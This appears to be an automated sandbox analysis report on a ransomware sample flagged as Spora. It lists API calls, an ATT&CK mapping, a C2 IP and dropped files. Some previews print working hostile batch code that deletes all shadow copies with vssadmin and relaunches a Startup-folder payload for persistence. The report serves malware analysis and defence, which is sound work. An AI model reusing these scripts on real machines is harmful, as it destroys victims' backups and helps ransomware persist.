      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_00662C30
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_0066ED75
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,42_2_0066EE42
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_0066311A
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A73184 GetSystemTimeAsFileTime,0_2_00A73184
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C36F0 GetUserNameW,0_2_009C36F0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A7B462 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00A7B462
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A46793 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_00A46793
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009B1960 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_009B1960
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A52073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00A52073
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A52D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00A52D69
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009B1020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_009B1020
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009B12E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_009B12E0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00642073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,42_2_00642073
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00642D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,42_2_00642D69

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting      		1
      Replication Through Removable Media      		231
      Windows Management Instrumentation      		12
      Scripting      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		OS Credential Dumping2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		2
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Windows Service      		2
      Obfuscated Files or Information      		LSASS Memory11
      Peripheral Device Discovery      		Remote Desktop ProtocolData from Removable Media2
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Scheduled Task/Job      		11
      Windows Service      		12
      Process Injection      		1
      DLL Side-Loading      		Security Account Manager1
      Account Discovery      		SMB/Windows Admin SharesData from Network Shared Drive11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      Service Execution      		1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		1
      File Deletion      		NTDS3
      File and Directory Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchd12
      Registry Run Keys / Startup Folder      		12
      Registry Run Keys / Startup Folder      		11
      Masquerading      		LSA Secrets58
      System Information Discovery      		SSHKeylogging2
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
      Virtualization/Sandbox Evasion      		Cached Domain Credentials1
      Network Share Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
      Process Injection      		DCSync241
      Security Software Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Indicator Removal      		Proc Filesystem13
      Virtualization/Sandbox Evasion      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow3
      Process Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
      System Owner/User Discovery      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
      System Network Configuration Discovery      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569986 Sample: xKvkNk9SXR.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 83 api.ipify.org 2->83 95 Suricata IDS alerts for network traffic 2->95 97 Multi AV Scanner detection for dropped file 2->97 99 Multi AV Scanner detection for submitted file 2->99 101 10 other signatures 2->101 10 xKvkNk9SXR.exe 22 2->10         started        15 cmd.exe 2 2->15         started        17 Xinfecter.exe 2->17         started        signatures3 process4 dnsIp5 85 185.147.34.53, 3586, 49705 HOSTSLIM-GLOBAL-NETWORKNL Iceland 10->85 87 api.ipify.org 104.26.12.205, 49704, 80 CLOUDFLARENETUS United States 10->87 75 C:\Users\user\AppData\...\Xinfecter.exe, PE32 10->75 dropped 77 C:\Windows\SysMain.sys, ASCII 10->77 dropped 79 C:\Users\user\AppData\S-8459.vbs, ASCII 10->79 dropped 81 4 other malicious files 10->81 dropped 107 Deletes shadow drive data (may be related to ransomware) 10->107 109 Drops PE files to the startup folder 10->109 111 Sample is not signed and drops a device driver 10->111 113 Contains functionality to clear event logs 10->113 19 cmd.exe 3 2 10->19         started        21 cmd.exe 1 10->21         started        23 cmd.exe 1 10->23         started        32 9 other processes 10->32 26 wscript.exe 15->26         started        28 conhost.exe 15->28         started        30 conhost.exe 17->30         started        file6 signatures7 process8 signatures9 34 wscript.exe 1 19->34         started        37 systeminfo.exe 2 1 21->37         started        39 find.exe 1 21->39         started        103 Uses schtasks.exe or at.exe to add and modify task schedules 23->103 41 tasklist.exe 1 23->41         started        43 findstr.exe 1 23->43         started        105 Windows Scripting host queries suspicious COM object (likely to drop second stage) 26->105 45 cmd.exe 26->45         started        47 cmd.exe 26->47         started        49 WmiPrvSE.exe 32->49         started        51 6 other processes 32->51 process10 signatures11 89 Windows Scripting host queries suspicious COM object (likely to drop second stage) 34->89 53 cmd.exe 1 34->53         started        55 cmd.exe 1 34->55         started        91 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->91 93 Writes or reads registry keys via WMI 37->93 57 conhost.exe 45->57         started        59 tasklist.exe 45->59         started        61 find.exe 45->61         started        63 conhost.exe 47->63         started        process12 process13 65 tasklist.exe 1 53->65         started        67 conhost.exe 53->67         started        69 find.exe 1 53->69         started        73 18 other processes 53->73 71 conhost.exe 55->71         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      xKvkNk9SXR.exe82%ReversingLabsWin32.Ransomware.Spora
      xKvkNk9SXR.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe82%ReversingLabsWin32.Ransomware.Spora

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      api.ipify.org
      		104.26.12.205
      		truefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://api.ipify.org/xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3296757158.0000000000988000.00000004.00000010.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://api.ipify.org/C#OxKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://www.kraken.com/learn/buy-bitcoin-btcxKvkNk9SXR.exe, Xinfecter.exe.0.drfalse
              		high
              http://api.ipify.org/Y/OxKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://www.coinbase.com/how-to-buy/bitcoinxKvkNk9SXR.exe, Xinfecter.exe.0.drfalse
                  		high
                  http://api.ipify.orgxKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.26.12.205
                    		api.ipify.orgUnited States
                    		13335CLOUDFLARENETUSfalse
                    185.147.34.53
                    		unknownIceland
                    		207083HOSTSLIM-GLOBAL-NETWORKNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1569986
                    Start date and time:2024-12-06 13:50:23 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 51s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:63
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:xKvkNk9SXR.exe
                    renamed because original name is a hash value
                    Original Sample Name:2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.adwa.evad.winEXE@116/22@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 49
                    • Number of non-executed functions: 229
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: xKvkNk9SXR.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    13:51:20Task SchedulerRun new task: Microsoft_Auto_Scheduler path: "C:\Users\user\AppData\S-2153.bat"
                    13:51:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.26.12.205GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                    • api.ipify.org/
                    8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                    • api.ipify.org/
                    Simple2.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                    • api.ipify.org/
                    Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                    • api.ipify.org/
                    perfcc.elfGet hashmaliciousXmrigBrowse
                    • api.ipify.org/
                    SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                    • api.ipify.org/
                    SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                    • api.ipify.org/
                    hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                    • api.ipify.org/
                    185.147.34.53BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                      lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                          8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                            Help.File@zohomail.eu_Fast.exeGet hashmaliciousTrojanRansomBrowse
                              Xinfecter.exeGet hashmaliciousTrojanRansomBrowse
                                Ross.dec1966@gmail.com_Fast.bin.exeGet hashmaliciousBabuk, Chaos, Conti, RegretLocker, TrojanRansomBrowse
                                  12.exe1Get hashmaliciousBTC, Conti, Neshta, RegretLocker, TrojanRansomBrowse
                                    DttL6H1DqQ.exeGet hashmaliciousBabuk, Chaos, ContiBrowse
                                      PAvH6odjUO.exeGet hashmaliciousVoidcryptBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        api.ipify.orgBiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                        • 104.26.13.205
                                        lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                        • 104.26.13.205
                                        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                        • 104.26.12.205
                                        8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                        • 104.26.12.205
                                        Simple1.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.74.152
                                        Simple1.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.13.205
                                        Simple2.exeGet hashmaliciousUnknownBrowse
                                        • 104.26.12.205
                                        Simple2.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.74.152
                                        systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.74.152
                                        systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.74.152

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        HOSTSLIM-GLOBAL-NETWORKNLBiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                        • 185.147.34.53
                                        lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                        • 185.147.34.53
                                        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                        • 185.147.34.53
                                        8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                        • 185.147.34.53
                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                        • 213.166.86.57
                                        cenSXPimaG.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 213.166.86.22
                                        SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                        • 103.214.4.45
                                        REMITTANCE SLIP.exeGet hashmaliciousFormBookBrowse
                                        • 103.214.4.45
                                        STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                        • 103.214.4.45
                                        PAYMENT SWIFT.exeGet hashmaliciousFormBookBrowse
                                        • 103.214.4.45
                                        CLOUDFLARENETUSBiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                        • 104.26.13.205
                                        lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                        • 104.26.13.205
                                        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                        • 104.26.12.205
                                        8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                        • 104.26.12.205
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 104.21.16.9
                                        https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.auGet hashmaliciousHTMLPhisherBrowse
                                        • 104.21.25.148
                                        https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                        • 104.21.85.204
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 172.67.165.166
                                        phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                        • 104.18.69.40
                                        Simple1.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.74.152

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\XAHXSVDO.txt

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:modified
                                        Size (bytes):12
                                        Entropy (8bit):2.6258145836939115
                                        Encrypted:false
                                        SSDEEP:3:fuM9:2I
                                        MD5:E4A5E3AE7A904A86A50AE5FC1A38F374
                                        SHA1:0B536BF59DE491CCC2CAA8AE52200CD6B61364E9
                                        SHA-256:4EF53CF7C95DBE1BE9AC5E3D7465B91B911FD5C198EB161A55AF5579D9390C1A
                                        SHA-512:17D3508E7E847B91E84A06BA32BAD9A6CEC55373EE877E1163AB74EF4E18A72C38DD43897BE21E26556CBDE58DF9446E06B59B2BB37CC0321B5228D57C80A146
                                        Malicious:false
                                        Preview:8.46.123.228

                                        C:\Users\user\AppData\N-Save.sys

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with very long lines (3460), with no line terminators
                                        Category:dropped
                                        Size (bytes):3460
                                        Entropy (8bit):6.010788731170718
                                        Encrypted:false
                                        SSDEEP:48:oCXvu0S5t8mhjt/VgCwcU9ytwDJ215enxwTzukpGd2lNk3nQ0qiozhlhxaXNBa0A:o8Ohx/wbewAmnIzuk0qNK8jhx8y0U9
                                        MD5:82344D5ED357A7C9F68991E642B6D283
                                        SHA1:8DAB2025878FD47D6DBF7C970202DEFD7EF351CD
                                        SHA-256:38C535FC2963F1B4C64F790D4112516F6B6AD907919F9167C9EA5FE72302F35D
                                        SHA-512:FD65453CC700490754B36645A887B99368A1CD2435070A36F747C6A9D3345AB43357064CBFF23A00F9DD4E755AEED55CAF4041BBFED063C83B46194C7EB49016
                                        Malicious:true
                                        Preview:$0h7MpNSgTlFd3CRFSNVV30N5lvtYn+mR30/wxgHkFxD8SnscMZkcQ0CViOasEL9mrbxO0UUMQ8gPFdBVZcr/HxvFkyuRS85evrDvtqa+ZIG9OlCV24Hf7w1cIwUrw4//hrNrFY6URO8t921Xin7G2UgSMXHPg9ira56JJ2G7NKD8XI3JHJze4+e8VJJ698/s4YzYlnKzTVZqSDzVdD9tCZM6xiB1LJVN6H1anciZbmisx/8wvlgMTJ8nIvGFJ+sDN2YmlizIwhA0uubAz76zgaT9SrxT7LoiiOp1W0/AaV8yuliO19yUvai3rZkrUgDASeS/gLYemH/o9TsOUKHjY1g==$1aysHVjBo1PNR3hucfExZ7TSy+tz+kgmYijzH+6ZLuQ8qKdJ0eGQfD7vX3aa+FAraVDziStYq4aFDSVorV4XEYSXoM5M+lQKh+H8+dSfRLmxF0SPlZbWtLFSQ8JY/vqYGWy08IhrgV3ZifmRJvMRJuB/irVW13mB7nogMTR/hn5jSE3nTuVlkNcFbERTjFEGuQgj04O/q6RwQsX0o4znLnhhWbmDej6UuFjdknL5MWo1wwnVOlxUQG0BrU14JnXssTJoMHpNHmHUlaJtS44ZzT/8yEhdcORBVqXYx67OejNITs4snHkHVtqFsMLS/kneCqRL7Ajas9U8yWXVbDOSVJQ==$2Jn5H7zJQuRVkH4nq19OCO05SjgMwIEkKhcLxAxE8kfG6KON/d5rrLO5/IrI2gAe4Fd2F/HPzbwJmC8hdzKNJv+q4GVMi5qYUDcHtNmJiE7iQ/n7QniliCOTg1HtpV24uNaVGchyF4MEnEJ6GNZEDS75LaG+60/YdQqrCoDvESwIsAd8D7qW//7DTbAnyzUA4o0rWJ9pklElfY9OOzMo8OIOBTlFgEiSRxINqXhu4JuupDBjuf+7W4oDJchSRM6+vf6tg12i2g81USm0AGOr42taa+7Mg6WMTz5zQ7ZTiC56Ca20kYM

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1257984
                                        Entropy (8bit):6.58800049787178
                                        Encrypted:false
                                        SSDEEP:24576:5ZqLyIjsi3CKrjp51iKT1gI0WSRuTxy087a2bJtMlLE7hUEPBUTIG+u4:aLfnCKrj8C1wRuTxaamM27hU4BUTIG+t
                                        MD5:603B398C14FFC8C0B647C58E9886C557
                                        SHA1:58B80929A19CFB40C683CC10F5C8167E5543C553
                                        SHA-256:2619065D71A290AD0369CB3C19F1D5A58C43BF7ABB52FB8828727483D32BDCF7
                                        SHA-512:A761820DF0CC415E2ED6637359788B3C6CE020F6097DB3DDA1FB3FAE64CBA38A72D9BE9359A273DE11F26B67264853DE22A7F7D9B82E56A776D9EEF58D379A32
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 82%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7................PE..L......e............................1........0....@.......................................@.................................D....................................... V..p...................4W.......V..@............0..(............................text............................... ..`.rdata.......0......................@..@.data...x...........................@....rsrc................X..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\AppData\S-2153.bat

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):138
                                        Entropy (8bit):4.970414275542141
                                        Encrypted:false
                                        SSDEEP:3:mKDD/j2hFHTnmTPcYWA6/hEREVdPTHAF6vWEzn9TmTPcYWA6/hEREVdPTHAoU:hGh9TnmTPYA6/Si3rHV7TQTPYA6/Si36
                                        MD5:82A528CBF39B8EA7E2982E7B2305204C
                                        SHA1:717836E0E2B304ED7AE239CC1DB0F6F80E0419B1
                                        SHA-256:616738526C38E04F992B7B9FC60CB7FEB3EE416BF47B69AA2C3A5F1A722A653B
                                        SHA-512:EFF7654E171DBD9BC471718A7E14EE3C84A9EDF948F4C8863C8107E653BE8BA06BC7A2876D506D6E4AE7EF2280E820D04615EBCD88894EF01B3667D070241DB3
                                        Malicious:true
                                        Preview:@echo off..IF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (..start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"..)

                                        C:\Users\user\AppData\S-6748.bat

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1849
                                        Entropy (8bit):5.3709338878779285
                                        Encrypted:false
                                        SSDEEP:48:NKsDnhnuYWnui9UEq5uhnuYWnuiGhnuYZacAXuknc4hg0hLdY:77kYliZqIkYliGkYZacAXuWBJnY
                                        MD5:9AE1F609F673BDC393BAD21D61A353DD
                                        SHA1:2F01C120D521280FA6A9833DBF905315307F2ED5
                                        SHA-256:05398841066ECC9AFBDA9706204511F6361E76100B3FD97D5B9A66A15D4F5292
                                        SHA-512:0E9487CF3874CE04AEA1B8282C0C6F4D524F149F2B39BC2AEC15943858E9A7176506CA956E0CA03A93095BFB3DAD4216A0A3D32A8F9B22C11FA50B1F6E31C15C
                                        Malicious:true
                                        Preview:@echo off..tasklist /v | find /I /c "dcdcf" > nul..if "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunning..set lend=deb..vssadmin.exe Delete Shadows /All /Quiet..title dcdcf..goto notend..:ErrorAlreadyRunning..exit..:secthree..tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv 2>NUL | find /I "xKvkNk9SXR.exe">NUL..if "%ERRORLEVEL%"=="0" goto imer..if %lend% == bed (goto akakak)..set lend=bed..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" (..start /d "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" Xinfecter.exe ..)..:secttwo..tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv 2>NUL | find /I "xKvkNk9SXR.exe">NUL..if "%ERRORLEVEL%"=="0" goto notend..goto secton..:notend..timeout /t 15 /nobreak >NUL..IF NOT EXIST "C:\Users\ReadMe.hta" (..goto secttwo..:secton..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"

                                        C:\Users\user\AppData\S-8459.vbs

                                        Download File
                                        Process:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
